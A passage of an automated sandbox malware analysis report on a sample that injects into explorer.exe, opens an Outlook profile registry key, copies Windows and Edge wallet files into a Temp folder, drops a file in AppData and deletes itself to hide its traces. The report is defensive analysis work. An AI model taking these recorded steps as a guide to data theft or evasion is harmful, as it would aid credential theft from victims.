                      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Binary string: WalletProxy.pdbGCTL source: explorer.exe, 0000000D.00000003.2655011353.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2640399855.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657373914.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2685359398.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657226319.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2684711204.00000000052CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2702006220.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: walletservice.pdbGCTL source: explorer.exe, 0000000D.00000003.2570547209.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2664889234.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: WalletProxy.pdb source: explorer.exe, 0000000D.00000003.2655011353.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2640399855.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657373914.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2685359398.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2657226319.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2684711204.00000000052CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2702006220.00000000052CD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: xy.pdb source: explorer.exe, 0000000D.00000003.2655011353.000000000523C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: WalletBackgroundServiceProxy.pdb source: explorer.exe, 0000000D.00000003.2700964728.000000000523C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2649083320.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2639119657.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2676572554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701582740.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701221963.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701414879.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2674928754.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2667473589.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2678065093.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2652375045.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.13.dr, WalletBackgroundServiceProxy.dll1.13.dr
                      Source: Binary string: WalletBackgroundServiceProxy.pdbGCTL source: explorer.exe, 0000000D.00000003.2649083320.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2639119657.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2676572554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701582740.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701221963.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2701414879.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2674928754.00000000052D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2667473589.0000000005240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2678065093.00000000052EA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2652375045.00000000052D6000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.13.dr, WalletBackgroundServiceProxy.dll1.13.dr
                      Source: Binary string: xy.pdbGCT.r source: explorer.exe, 0000000D.00000003.2655011353.000000000523C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: walletservice.pdb source: explorer.exe, 0000000D.00000003.2570547209.00000000052C7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2664889234.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: xy.pdbGCT.orp source: explorer.exe, 0000000D.00000003.2683048434.0000000005231000.00000004.00000020.00020000.00000000.sdmp
                      Source: WalletService.dll1.13.dr | Static PE information: 0xACABE18A [Wed Oct 19 11:05:46 2061 UTC]
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_2_00849247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 7_2_00849247
                      Source: Windows.ApplicationModel.Wallet.dll.13.dr | Static PE information: section name: .didat
                      Source: WalletService.dll1.13.dr | Static PE information: section name: .didat
                      Source: Windows.ApplicationModel.Wallet.dll2.13.dr | Static PE information: section name: .didat
                      Source: Windows.ApplicationModel.Wallet.dll5.13.dr | Static PE information: section name: .didat
                      Source: Windows.ApplicationModel.Wallet.dll6.13.dr | Static PE information: section name: .didat
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004032DC push ebp; iretd 0_2_00403485
                      Source: C:\Users\user\Desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe | Code function: 0_2_004032DC push edx; retn EC8Bh 0_2_004035B1
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_3_05C99719 push eax; ret 7_3_05C99725
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_3_05CBCF98 pushfd ; iretd 7_3_05CBCF99
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_3_05CBEDA1 push eax; ret 7_3_05CBEDAD
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_3_05CBD10B push eax; retf 7_3_05CBD111
                      Source: C:\Windows\SysWOW64\explorer.exe | Code function: 7_3_05CBCF1C push edx; iretd 7_3_05CBCF1D
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A3B124 push ebp; retf 8_2_00A3B12B
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A3B12C push ebp; retf 8_2_00A3B133
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A3A055 push es; iretd 8_2_00A3A05D
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A347A7 push esp; iretd 8_2_00A347A8
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A34124 push esi; retf 8_2_00A34143
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A340AC push esi; retf 8_2_00A340BB
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A340BC push esi; retf 8_2_00A340C3
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A34001 push esi; retf 8_2_00A34063
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A31405 push esi; ret 8_2_00A31407
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A34084 push esi; retf 8_2_00A3409B
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A34104 push ebp; retf 8_2_00A3411B
                      Source: C:\Windows\explorer.exeCode function: 8_2_00A3409C push ebp; retf 8_2_00A340AB
                      Source: 172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeStatic PE information: section name: .text entropy: 7.0440254923492915
                      Source: hfetwhc.2.drStatic PE information: section name: .text entropy: 7.0440254923492915
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.muiJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\SysWOW64\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hfetwhcJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\WalletProxy.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hfetwhcJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.LICENSE.txtJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D700\C\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\wallet-drawer.bundle.js.LICENSE.txtJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exe
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\hfetwhc:Zone.Identifier read attributes | delete
